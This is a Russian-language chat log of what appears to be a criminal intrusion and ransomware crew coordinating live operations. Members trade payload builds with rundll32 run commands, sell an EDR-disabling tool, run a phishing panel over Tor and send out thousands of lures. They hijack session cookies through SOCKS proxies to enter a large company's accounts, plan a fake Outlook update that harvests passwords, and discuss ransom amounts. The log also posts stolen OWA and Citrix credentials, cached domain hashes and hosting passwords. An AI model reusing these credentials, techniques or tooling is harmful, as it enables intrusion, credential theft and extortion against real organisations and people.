[2024-05-27 12:34:51] @usernamegg:matrix.bestflowers247.online: Обновление. Кардинально переработали принцип работы инструмента и так же добавили свежие драйвера - стоимость увеличили до 1,5к за каждый ЕДР, можешь в топике посмотреть. Могу выдать тестовый билд для проверки
--------------------
[2024-05-27 12:36:49] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> ==shockhosting.net==
> oraliestatutory@fthcapital.com
> ds12wWu'@Q}Q$<dvjvDF
>
> gentillytransfer.com = 89.117.2.89
> ```

блин, я смотрю он зачем-то еще на cloudflare домен переносит, чтобы просто а запись прописать
--------------------
[2024-05-27 12:36:59] @lapa:matrix.bestflowers247.online: на самом shockhosting можно же это все сделать
--------------------
[2024-05-27 12:39:43] @burito:matrix.bestflowers247.online: rundll32.exe dll.dll,GetModuleProp
строка IWrerumUSXPXmBXxWoklHlVzfucQLc
--------------------
[2024-05-27 12:39:43] @burito:matrix.bestflowers247.online: cobs.zip
--------------------
[2024-05-27 12:40:53] @usernamegg:matrix.bestflowers247.online: сейчас нужно переделать
--------------------
[2024-05-27 12:40:55] @usernamegg:matrix.bestflowers247.online: скину билды
--------------------
[2024-05-27 12:43:53] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> ну только нам txt файлы нужны

аа
--------------------
[2024-05-27 12:43:54] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-05-27 12:44:14] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 12:44:29] @lapa:matrix.bestflowers247.online: просто вот тут в addons покупается за 0 баксов dns managment
--------------------
[2024-05-27 12:44:31] @lapa:matrix.bestflowers247.online: и все
--------------------
[2024-05-27 12:44:45] @lapa:matrix.bestflowers247.online: и не нужно переносить управление на cloudflare
--------------------
[2024-05-27 12:45:06] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 12:45:10] @lapa:matrix.bestflowers247.online: и вот тут прописывается
--------------------
[2024-05-27 12:46:27] @usernamegg:matrix.bestflowers247.online: там резолвит говорит быстрее
--------------------
[2024-05-27 12:46:45] @lapa:matrix.bestflowers247.online: а ну ок
--------------------
[2024-05-27 12:46:50] @usernamegg:matrix.bestflowers247.online: как только сменил там сразу домен пингуется
--------------------
[2024-05-27 12:46:54] @usernamegg:matrix.bestflowers247.online: быстро вообщем
--------------------
[2024-05-27 12:47:47] @lapa:matrix.bestflowers247.online: тогда пусть выдает мне только cloudflare доступ к домену
--------------------
[2024-05-27 12:49:02] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-05-27 12:54:33] @usernamegg:matrix.bestflowers247.online: GetModuleProp

--------------------
[2024-05-27 12:54:41] @usernamegg:matrix.bestflowers247.online: 39_payload_x64.bin
--------------------
[2024-05-27 12:54:42] @usernamegg:matrix.bestflowers247.online: 39smb_payload_x86.bin
--------------------
[2024-05-27 12:54:43] @usernamegg:matrix.bestflowers247.online: 39smb_payload_x64.bin
--------------------
[2024-05-27 12:54:43] @usernamegg:matrix.bestflowers247.online: 39_payload_x86.bin
--------------------
[2024-05-27 12:54:54] @usernamegg:matrix.bestflowers247.online: smb впервую очередь сделай плз
--------------------
[2024-05-27 12:54:58] @usernamegg:matrix.bestflowers247.online: прямо горит
--------------------
[2024-05-27 12:55:11] @burito:matrix.bestflowers247.online: Минут 20
--------------------
[2024-05-27 12:55:29] @usernamegg:matrix.bestflowers247.online: [15:35:34] AA: фалкон сможешь выключить ?
[15:39:06] KernelMode - killer EDR: если не отключит - надо будет лог скинуть, там драйвера меняют периодически, в логе видно будет. по логу посмотрю - подправлю
[15:45:21] KernelMode - killer EDR: текущий билд запусти
--------------------
[2024-05-27 12:55:36] @muaddib6:matrix.org: ++
--------------------
[2024-05-27 12:57:00] @muaddib6:matrix.org: Хорошо
--------------------
[2024-05-27 13:02:49] @usernamegg:matrix.bestflowers247.online: супер
--------------------
[2024-05-27 13:02:54] @usernamegg:matrix.bestflowers247.online: в одном месте исправил
--------------------
[2024-05-27 13:03:00] @usernamegg:matrix.bestflowers247.online: но сейчас все хорошо
--------------------
[2024-05-27 13:08:00] @usernamegg:matrix.bestflowers247.online: так а от gentillytransfer.com тебе нужен в cloudflare доступ?
--------------------
[2024-05-27 13:08:07] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> так а от gentillytransfer.com тебе нужен в cloudflare доступ?

да
--------------------
[2024-05-27 13:08:17] @lapa:matrix.bestflowers247.online: хоте нет
--------------------
[2024-05-27 13:08:20] @lapa:matrix.bestflowers247.online: не нужен
--------------------
[2024-05-27 13:08:22] @usernamegg:matrix.bestflowers247.online: отлично , жду
--------------------
[2024-05-27 13:08:29] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 13:09:53] @lapa:matrix.bestflowers247.online: можно сейчас тестово прослать 1 домен
--------------------
[2024-05-27 13:10:01] @lapa:matrix.bestflowers247.online: который в пятницу делали
--------------------
[2024-05-27 13:11:56] @usernamegg:matrix.bestflowers247.online: это ты про какой ?
--------------------
[2024-05-27 13:12:13] @usernamegg:matrix.bestflowers247.online: только юсу нет смысла слать можно канаду
--------------------
[2024-05-27 13:12:16] @usernamegg:matrix.bestflowers247.online: или германию
--------------------
[2024-05-27 13:12:17] @lapa:matrix.bestflowers247.online: `https://0nline.ultimateparlor.com/` про этот
--------------------
[2024-05-27 13:12:31] @lapa:matrix.bestflowers247.online: ну по европе прошлю чутка
--------------------
[2024-05-27 13:12:44] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-27 13:12:54] @lapa:matrix.bestflowers247.online: ок, скоро все проверю и пролю 10к
--------------------
[2024-05-27 13:12:58] @lapa:matrix.bestflowers247.online: * ок, скоро все проверю и прошлю 10к
--------------------
[2024-05-27 13:13:48] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 13:18:16] @muaddib6:matrix.org: > <@usernamess:matrix.bestflowers247.online> GetModuleProp

У меня крашятся шк. не могу сделать
--------------------
[2024-05-27 13:22:30] @lapa:matrix.bestflowers247.online: `https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/moloch/sessions/list` тут есть сессии, но чет пока только реверсы одни
--------------------
[2024-05-27 13:22:48] @lapa:matrix.bestflowers247.online: и мой тестовый дедик тоже блочит
--------------------
[2024-05-27 13:22:53] @lapa:matrix.bestflowers247.online: не пропускает
--------------------
[2024-05-27 13:28:10] @usernamett:matrix.bestflowers247.online: ```
============================================
https://mail.worldposta.com/owa/auth.owa:it.dept@morshedy.com:P@ssw0rd1981
www.datanyze.com
it.dept@morshedy.com
Ghb^%gvc_098Bhfq1
============================================
https://mail.sfere2.com/owa/auth.owa:commande@sdme13.fr:commande13  VERIFY PHONE NUMBER - SMS +++
www.datanyze.com
commande@sdme13.fr
4wD5=CHk#$%b546vbUk
============================================
```
--------------------
[2024-05-27 13:28:58] @lapa:matrix.bestflowers247.online: 5k+ ушло
--------------------
[2024-05-27 13:29:09] @lapa:matrix.bestflowers247.online: и ни одной пропущенной сессии, странно, но подождем
--------------------
[2024-05-27 13:29:22] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> smb впервую очередь сделай плз

rundll32.exe dll.dll,GetModuleProp
строка IWrerumUSXPXmBXxWoklHlVzfucQLc
--------------------
[2024-05-27 13:29:22] @burito:matrix.bestflowers247.online: 39smb.zip
--------------------
[2024-05-27 13:29:30] @usernamegg:matrix.bestflowers247.online: не сразу
--------------------
[2024-05-27 13:29:51] @usernamegg:matrix.bestflowers247.online: мы должны куку забрать ?
--------------------
[2024-05-27 13:30:02] @lapa:matrix.bestflowers247.online: ну да
--------------------
[2024-05-27 13:30:21] @lapa:matrix.bestflowers247.online: я там попробую все же фильтр ослабить
--------------------
[2024-05-27 13:30:27] @lapa:matrix.bestflowers247.online: а то даже меня уже не пускает
--------------------
[2024-05-27 13:30:36] @lapa:matrix.bestflowers247.online: с обычного рдп
--------------------
[2024-05-27 13:33:44] @usernamegg:matrix.bestflowers247.online: понял, хорошо
--------------------
[2024-05-27 13:33:55] @usernamegg:matrix.bestflowers247.online: biK5r76KGHt11t4SDoQ66Sj8sQNtitVpu
--------------------
[2024-05-27 13:35:28] @usernamegg:matrix.bestflowers247.online: Test
--------------------
[2024-05-27 13:35:38] @usernamegg:matrix.bestflowers247.online: Швейцария пока только
--------------------
[2024-05-27 13:35:58] @lapa:matrix.bestflowers247.online: ща фильтр ослаюлю
--------------------
[2024-05-27 13:36:01] @lapa:matrix.bestflowers247.online: виснет там все
--------------------
[2024-05-27 13:36:04] @lapa:matrix.bestflowers247.online: панель эта
--------------------
[2024-05-27 13:36:11] @lapa:matrix.bestflowers247.online: потому, что через тор
--------------------
[2024-05-27 13:36:29] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> 39_payload_x64.bin

rundll32.exe dll.dll,GetModuleProp
строка IWrerumUSXPXmBXxWoklHlVzfucQLc
--------------------
[2024-05-27 13:36:29] @burito:matrix.bestflowers247.online: 39.zip
--------------------
[2024-05-27 13:42:43] @usernamegg:matrix.bestflowers247.online: да , скорее всего из-за тора
--------------------
[2024-05-27 13:42:48] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 13:43:56] @lapa:matrix.bestflowers247.online: ну 7.5к ушло
--------------------
[2024-05-27 13:44:01] @lapa:matrix.bestflowers247.online: и только вот один ввод кредов
--------------------
[2024-05-27 13:44:17] @lapa:matrix.bestflowers247.online: пока смотрю видос как ослабить фильтр все же
--------------------
[2024-05-27 13:48:28] @lapa:matrix.bestflowers247.online: ослабил, сейчас мой рдп пустило
--------------------
[2024-05-27 13:48:31] @lapa:matrix.bestflowers247.online: прошлдю еще 7к
--------------------
[2024-05-27 13:48:46] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2024-05-27 13:55:45] @lapa:matrix.bestflowers247.online: ну вот кстати смотрю вводят логин, а пасс потом чет не ввели
--------------------
[2024-05-27 13:56:47] @lapa:matrix.bestflowers247.online: ну 12к ушло, стонул
--------------------
[2024-05-27 14:04:43] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 14:04:58] @usernamegg:matrix.bestflowers247.online: сокс
--------------------
[2024-05-27 14:05:10] @usernamegg:matrix.bestflowers247.online: * USA
--------------------
[2024-05-27 14:05:15] @usernamegg:matrix.bestflowers247.online: идет
--------------------
[2024-05-27 14:06:20] @lapa:matrix.bestflowers247.online: где?
--------------------
[2024-05-27 14:06:24] @lapa:matrix.bestflowers247.online: `https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/moloch/captured-data/list`
--------------------
[2024-05-27 14:06:29] @lapa:matrix.bestflowers247.online: я тут посмтрю, нет никакой юсы
--------------------
[2024-05-27 14:06:47] @usernamegg:matrix.bestflowers247.online: https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/moloch/sessions/list
--------------------
[2024-05-27 14:06:50] @usernamegg:matrix.bestflowers247.online: а я тут
--------------------
[2024-05-27 14:07:02] @usernamegg:matrix.bestflowers247.online: неверно смотрю?
--------------------
[2024-05-27 14:07:22] @usernamegg:matrix.bestflowers247.online: зеленым что горит?
--------------------
[2024-05-27 14:07:49] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> неверно смотрю?

вы просто смотрите всех кто туда зашел. там реверсов много
--------------------
[2024-05-27 14:07:54] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> зеленым что горит?

те, кто ввел пасс
--------------------
[2024-05-27 14:07:58] @lapa:matrix.bestflowers247.online: я так думаю
--------------------
[2024-05-27 14:08:41] @lapa:matrix.bestflowers247.online: ну что-то не особо конечно
--------------------
[2024-05-27 14:09:32] @lapa:matrix.bestflowers247.online: соксы нужно думаю сделать своих
--------------------
[2024-05-27 14:09:34] @lapa:matrix.bestflowers247.online: пролить
--------------------
[2024-05-27 14:09:49] @lapa:matrix.bestflowers247.online: потому что соксы сипанельные я с ним слал много раз
--------------------
[2024-05-27 14:10:13] @lapa:matrix.bestflowers247.online: да и брут с них идет
--------------------
[2024-05-27 14:10:53] @usernamegg:matrix.bestflowers247.online: где сокс брать
--------------------
[2024-05-27 14:11:16] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:12:27] @lapa:matrix.bestflowers247.online: хз
--------------------
[2024-05-27 14:12:28] @lapa:matrix.bestflowers247.online: скоро посмотрю
--------------------
[2024-05-27 14:13:23] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> sent a file.

Готово
--------------------
[2024-05-27 14:13:40] @muaddib6:matrix.org: 2.7z
--------------------
[2024-05-27 14:14:09] @muaddib6:matrix.org: строка:
--------------------
[2024-05-27 14:14:10] @muaddib6:matrix.org: Hgsv4PZph2FuMWU7nDYrASLaxCmtEX6RJqN5GkTwyfce8KBbzQ
--------------------
[2024-05-27 14:14:53] @usernamegg:matrix.bestflowers247.online: я вот взял одну куку
--------------------
[2024-05-27 14:14:58] @usernamegg:matrix.bestflowers247.online: надо теперь сокс
--------------------
[2024-05-27 14:15:02] @lapa:matrix.bestflowers247.online: скоро
--------------------
[2024-05-27 14:15:02] @usernamegg:matrix.bestflowers247.online: что бы я подключился туда
--------------------
[2024-05-27 14:15:10] @usernamegg:matrix.bestflowers247.online: 83.99.44.245
--------------------
[2024-05-27 14:15:14] @usernamegg:matrix.bestflowers247.online: от ip от куки
--------------------
[2024-05-27 14:15:36] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:15:42] @lapa:matrix.bestflowers247.online: походу вот тут соксы
--------------------
[2024-05-27 14:15:57] @lapa:matrix.bestflowers247.online: 89.117.2.54:1080 socks5
--------------------
[2024-05-27 14:15:59] @lapa:matrix.bestflowers247.online: попробуйте его
--------------------
[2024-05-27 14:16:11] @lapa:matrix.bestflowers247.online: но так то да, странно у них сделано
--------------------
[2024-05-27 14:17:37] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:17:43] @usernamegg:matrix.bestflowers247.online: мне вот такой формат нужен
--------------------
[2024-05-27 14:19:17] @usernamegg:matrix.bestflowers247.online: 89.117.2.54:1080@b7iSQy:zvcTPWDCaJMfBID4
--------------------
[2024-05-27 14:19:19] @lapa:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> sent an image.

зайтиде в этот раздел
--------------------
[2024-05-27 14:19:24] @usernamegg:matrix.bestflowers247.online: вот так выходил ?
--------------------
[2024-05-27 14:19:24] @lapa:matrix.bestflowers247.online: у меня виснет пока
--------------------
[2024-05-27 14:19:39] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> 89.117.2.54:1080@b7iSQy:zvcTPWDCaJMfBID4

получается да
--------------------
[2024-05-27 14:19:46] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 14:21:36] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:22:03] @usernamegg:matrix.bestflowers247.online: login.live.com
--------------------
[2024-05-27 14:22:04] @lapa:matrix.bestflowers247.online: ясно
--------------------
[2024-05-27 14:22:07] @usernamegg:matrix.bestflowers247.online: через зашел
--------------------
[2024-05-27 14:22:28] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:23:29] @lapa:matrix.bestflowers247.online: `https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/guides/cookies-injection` тут вроде гайд есть
--------------------
[2024-05-27 14:23:32] @lapa:matrix.bestflowers247.online: посмотрите
--------------------
[2024-05-27 14:24:43] @lapa:matrix.bestflowers247.online: там видос
--------------------
[2024-05-27 14:26:27] @lapa:matrix.bestflowers247.online: он там вообще через консолько вставляет куки походу
--------------------
[2024-05-27 14:26:50] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-05-27 14:26:59] @usernamegg:matrix.bestflowers247.online: у меня есть софт очень удобный
--------------------
[2024-05-27 14:29:18] @n3auxaxl:matrix.collectionofmanager.space: virtualbox слетел с виндой, щас накатываю новый, быстро туда visual studio
--------------------
[2024-05-27 14:29:20] @n3auxaxl:matrix.collectionofmanager.space: и доделаю форму
--------------------
[2024-05-27 14:29:25] @n3auxaxl:matrix.collectionofmanager.space: код остался
--------------------
[2024-05-27 14:29:52] @n3auxaxl:matrix.collectionofmanager.space: заново писать не буду, только тачку поставить и туда накатить все что нужно для билда
--------------------
[2024-05-27 14:31:22] @usernamegg:matrix.bestflowers247.online: рабоатет
--------------------
[2024-05-27 14:31:25] @usernamegg:matrix.bestflowers247.online: тачки вижу у него
--------------------
[2024-05-27 14:31:28] @usernamegg:matrix.bestflowers247.online: но все выключены
--------------------
[2024-05-27 14:31:30] @usernamegg:matrix.bestflowers247.online: пойду еще попробую
--------------------
[2024-05-27 14:31:40] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 14:33:18] @tinker:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 14:43:11] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:47:08] @usernamegg:matrix.bestflowers247.online: странно
--------------------
[2024-05-27 14:47:15] @usernamegg:matrix.bestflowers247.online: куку подцепило но не заходит
--------------------
[2024-05-27 14:47:26] @usernamegg:matrix.bestflowers247.online: пошел дальше
--------------------
[2024-05-27 14:48:31] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 14:50:17] @usernamegg:matrix.bestflowers247.online: зашел под другим
--------------------
[2024-05-27 14:50:19] @usernamegg:matrix.bestflowers247.online: бельгиец
--------------------
[2024-05-27 14:50:29] @usernamegg:matrix.bestflowers247.online: может сокс другой надо поставить у другого ?
--------------------
[2024-05-27 14:50:59] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> может сокс другой надо поставить у другого ?

нет, там только один линк я слал
--------------------
[2024-05-27 14:51:11] @lapa:matrix.bestflowers247.online: там сокс это и есть сервер домена
--------------------
[2024-05-27 14:51:23] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:51:45] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-27 14:51:49] @usernamegg:matrix.bestflowers247.online: франция почему то
--------------------
[2024-05-27 14:51:51] @usernamegg:matrix.bestflowers247.online: только
--------------------
[2024-05-27 14:52:04] @lapa:matrix.bestflowers247.online: ну я всю европу слал
--------------------
[2024-05-27 14:52:22] @lapa:matrix.bestflowers247.online: 21к ушло, но как-то слабо
--------------------
[2024-05-27 14:52:34] @lapa:matrix.bestflowers247.online: завтра еще прошлем
--------------------
[2024-05-27 14:52:51] @lapa:matrix.bestflowers247.online: впском на завтра штуки 3 для европы нужно сделать
--------------------
[2024-05-27 14:53:56] @usernamegg:matrix.bestflowers247.online: залетает как домой
--------------------
[2024-05-27 14:53:58] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 14:54:07] @usernamegg:matrix.bestflowers247.online: я пока проверю
--------------------
[2024-05-27 14:54:22] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-27 14:54:27] @usernamegg:matrix.bestflowers247.online: ну что у нас с файлом ?
--------------------
[2024-05-27 14:55:15] @n3auxaxl:matrix.collectionofmanager.space: > <@usernamegg:matrix.bestflowers247.online> ну что у нас с файлом ?

сетаплю тачку же
--------------------
[2024-05-27 14:55:34] @n3auxaxl:matrix.collectionofmanager.space: работать будет так же как на той фотке
--------------------
[2024-05-27 14:57:05] @n3auxaxl:matrix.collectionofmanager.space: запускается .bat, запускает пику, потом запускается форма, после того как в форме ввел пароль и логин, сохраняем все в файл C:\\ProgramData\\outlook_filter_upd.log, и пишем, что обновление прошло успешно
--------------------
[2024-05-27 14:57:07] @n3auxaxl:matrix.collectionofmanager.space: схема такая
--------------------
[2024-05-27 14:57:48] @lapa:matrix.bestflowers247.online: rewe-group.com там вроде 88 миллиардов компания
--------------------
[2024-05-27 14:58:13] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2024-05-27 14:58:21] @usernamegg:matrix.bestflowers247.online: когда проверить можно и стартануть ?
--------------------
[2024-05-27 14:58:52] @n3auxaxl:matrix.collectionofmanager.space: .bat готов
форма ( код написан, но не могу сбилдить, сейчас тавлю тачку и делаю билд )
пика готова
--------------------
[2024-05-27 14:59:15] @n3auxaxl:matrix.collectionofmanager.space: думаю +- 1 час
--------------------
[2024-05-27 15:03:26] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> rewe-group.com там вроде 88 миллиардов компания

какой линк вводить в браузере когда куку натянул ?
--------------------
[2024-05-27 15:03:59] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> какой линк вводить в браузере когда куку натянул ?

хз
--------------------
[2024-05-27 15:04:03] @lapa:matrix.bestflowers247.online: попробуйте adfs.rewe-group.com
--------------------
[2024-05-27 15:04:45] @lapa:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:04:55] @lapa:matrix.bestflowers247.online: вроде как на этом домене была авторизация
--------------------
[2024-05-27 15:06:39] @usernamegg:matrix.bestflowers247.online: login.microsoftonline.com
--------------------
[2024-05-27 15:06:43] @usernamegg:matrix.bestflowers247.online: зашел
--------------------
[2024-05-27 15:06:53] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 15:07:17] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:07:24] @usernamegg:matrix.bestflowers247.online: это жесть конечно если я сейчас разберусь как до их сети добраться
--------------------
[2024-05-27 15:07:28] @usernamegg:matrix.bestflowers247.online: будет пиздец (
--------------------
[2024-05-27 15:07:30] @usernamegg:matrix.bestflowers247.online: сорян за мат
--------------------
[2024-05-27 15:07:36] @lapa:matrix.bestflowers247.online: ну пробуйте
--------------------
[2024-05-27 15:07:39] @lapa:matrix.bestflowers247.online: я думал вы уже знаете как
--------------------
[2024-05-27 15:07:54] @lapa:matrix.bestflowers247.online: компания при чет оч крупная
--------------------
[2024-05-27 15:07:56] @usernamegg:matrix.bestflowers247.online: ну я видел вход какой есть
--------------------
[2024-05-27 15:07:58] @lapa:matrix.bestflowers247.online: еще найти такую
--------------------
[2024-05-27 15:08:17] @lapa:matrix.bestflowers247.online: * компания при чем оч крупная
--------------------
[2024-05-27 15:09:17] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:09:20] @usernamegg:matrix.bestflowers247.online: работает перехват куки )
--------------------
[2024-05-27 15:09:24] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:09:27] @usernamegg:matrix.bestflowers247.online: работает перехват куки )
--------------------
[2024-05-27 15:09:59] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:10:03] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:10:38] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 15:12:30] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:12:35] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:12:40] @usernamegg:matrix.bestflowers247.online: капец
--------------------
[2024-05-27 15:12:47] @usernamegg:matrix.bestflowers247.online: ЖЕСТКО
--------------------
[2024-05-27 15:13:36] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:13:48] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:13:54] @lapa:matrix.bestflowers247.online: ну надеюсь получится ее сделать
--------------------
[2024-05-27 15:20:25] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 15:21:56] @usernamegg:matrix.bestflowers247.online: я не вижу конекта к сети
--------------------
[2024-05-27 15:21:58] @usernamegg:matrix.bestflowers247.online: тут
--------------------
[2024-05-27 15:22:05] @usernamegg:matrix.bestflowers247.online: нету впн или еще что то
--------------------
[2024-05-27 15:22:07] @usernamegg:matrix.bestflowers247.online: как вот тут смотри
--------------------
[2024-05-27 15:22:12] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:22:34] @usernamegg:matrix.bestflowers247.online: cisco
--------------------
[2024-05-27 15:22:42] @usernamegg:matrix.bestflowers247.online: ща зайду еще под другим линком
--------------------
[2024-05-27 15:24:40] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 15:29:43] @usernamecc:matrix.bestflowers247.online: pkaufmann.com \\ id:85af65f2-a2e2-4f97-bda1-dfdec01a9505
--------------------
[2024-05-27 15:30:39] @usernamess:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 15:40:03] @usernamegg:matrix.bestflowers247.online: [15:39:06] KernelMode - killer EDR: если не отключит - надо будет лог скинуть, там драйвера меняют периодически, в логе видно будет. по логу посмотрю - подправлю
[15:45:21] KernelMode - killer EDR: текущий билд запусти
--------------------
[2024-05-27 15:50:40] @lapa:matrix.bestflowers247.online: нужен сервер под соксы виндовые
--------------------
[2024-05-27 15:50:49] @lapa:matrix.bestflowers247.online: а то что-то уже на сипанелях соксы не поднимаются
--------------------
[2024-05-27 15:52:00] @lapa:matrix.bestflowers247.online: офнусь пока что
--------------------
[2024-05-27 15:53:18] @usernamegg:matrix.bestflowers247.online: сделаем
--------------------
[2024-05-27 15:54:59] @usernamegg:matrix.bestflowers247.online: https://c-appcitrix.sedgwick.com/logon/LogonPoint/tmindex.html :hstokes:Spring2024!
--------------------
[2024-05-27 15:55:11] @usernamegg:matrix.bestflowers247.online: 15B
--------------------
[2024-05-27 15:56:05] @usernamezz:matrix.bestflowers247.online: ```
$DCC2$10240#Administrator#3a5f417f2cb423b79e86d369d146801c
$DCC2$10240#csgcwadmin#92dd0317b33915d67e8bb92daba8ac98
$DCC2$10240#csgadmin#75e7319e8deb674ff389017ef3274a95
```
--------------------
[2024-05-27 16:00:31] @usernamemm:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 16:00:35] @usernamemm:matrix.bestflowers247.online: image.png
--------------------
[2024-05-27 16:02:27] @nickolas:talks.icu: о супер!
--------------------
[2024-05-27 16:02:31] @nickolas:talks.icu: надо тоже будет попробовать
--------------------
[2024-05-27 16:02:51] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2024-05-27 16:02:55] @usernamegg:matrix.bestflowers247.online: куки рабочая тема
--------------------
[2024-05-27 16:03:01] @nickolas:talks.icu: о как бнпспорт пошли торги ))
--------------------
[2024-05-27 16:03:05] @nickolas:talks.icu: красиво залочил
--------------------
[2024-05-27 16:03:08] @usernamegg:matrix.bestflowers247.online: канаду звоните
--------------------
[2024-05-27 16:03:12] @usernamegg:matrix.bestflowers247.online: у них нету
--------------------
[2024-05-27 16:03:34] @usernamegg:matrix.bestflowers247.online: для памяти
--------------------
[2024-05-27 16:03:47] @usernamegg:matrix.bestflowers247.online: ну что ?
--------------------
[2024-05-27 16:03:54] @nickolas:talks.icu: мы готовимся
--------------------
[2024-05-27 16:03:56] @nickolas:talks.icu: у нас изменения
--------------------
[2024-05-27 16:04:18] @usernamegg:matrix.bestflowers247.online: какие ?
--------------------
[2024-05-27 16:05:00] @nickolas:talks.icu: софт переделываем, переотбираем бизы
--------------------
[2024-05-27 16:05:09] @nickolas:talks.icu: ну и собственно мы всех распустили до завтра
--------------------
[2024-05-27 16:07:36] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 16:07:43] @n3auxaxl:matrix.collectionofmanager.space: еще нет
--------------------
[2024-05-27 16:07:47] @n3auxaxl:matrix.collectionofmanager.space: обновляется все
--------------------
[2024-05-27 16:07:58] @nickolas:talks.icu: детектов вылезло куча на кроуде
--------------------
[2024-05-27 16:08:02] @n3auxaxl:matrix.collectionofmanager.space: долго пиздец
--------------------
[2024-05-27 16:08:07] @nickolas:talks.icu: причем детекты и по коннекту, и по сбору инфы
--------------------
[2024-05-27 16:08:08] @nickolas:talks.icu: жуть
--------------------
[2024-05-27 16:08:14] @nickolas:talks.icu: давай закрывай их на 6-8м$
--------------------
[2024-05-27 16:08:33] @nickolas:talks.icu: и отметим начало лета, и нашего вновь успешного, совместного сотрудничества :)
--------------------
[2024-05-27 16:08:44] @nickolas:talks.icu: мы кстати все лето будем работать
--------------------
[2024-05-27 16:11:19] @usernamezz:matrix.bestflowers247.online: `$DCC2$10240#bmadmin#07883108370a6ba2cdadb8484e8af1ad`
--------------------
[2024-05-27 16:14:12] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> давай закрывай их на 6-8м$

посмотрю на два следующих ответа
--------------------
[2024-05-27 16:14:57] @usernamegg:matrix.bestflowers247.online: почему
--------------------
[2024-05-27 16:15:45] @n3auxaxl:matrix.collectionofmanager.space: ну тачку же с нуля ставлю
--------------------
[2024-05-27 16:15:49] @n3auxaxl:matrix.collectionofmanager.space: скачивается и обновляется
--------------------
[2024-05-27 16:15:57] @n3auxaxl:matrix.collectionofmanager.space: винда последний пакет + visual studio
--------------------
[2024-05-27 16:16:09] @usernamegg:matrix.bestflowers247.online: давай
--------------------
[2024-05-27 16:16:11] @n3auxaxl:matrix.collectionofmanager.space: + остальные програмы для удаления всякой херни по типу телеметрии
--------------------
[2024-05-27 16:16:22] @usernamett:matrix.bestflowers247.online: ```
GreenFirst Forest Products
greenfirst.ca
```

--------------------
[2024-05-27 16:16:22] @n3auxaxl:matrix.collectionofmanager.space: щас уже почти все обновилось
--------------------
[2024-05-27 16:16:26] @n3auxaxl:matrix.collectionofmanager.space: из системы всю херню вырежу
--------------------
[2024-05-27 16:16:29] @n3auxaxl:matrix.collectionofmanager.space: и делаю билды
--------------------
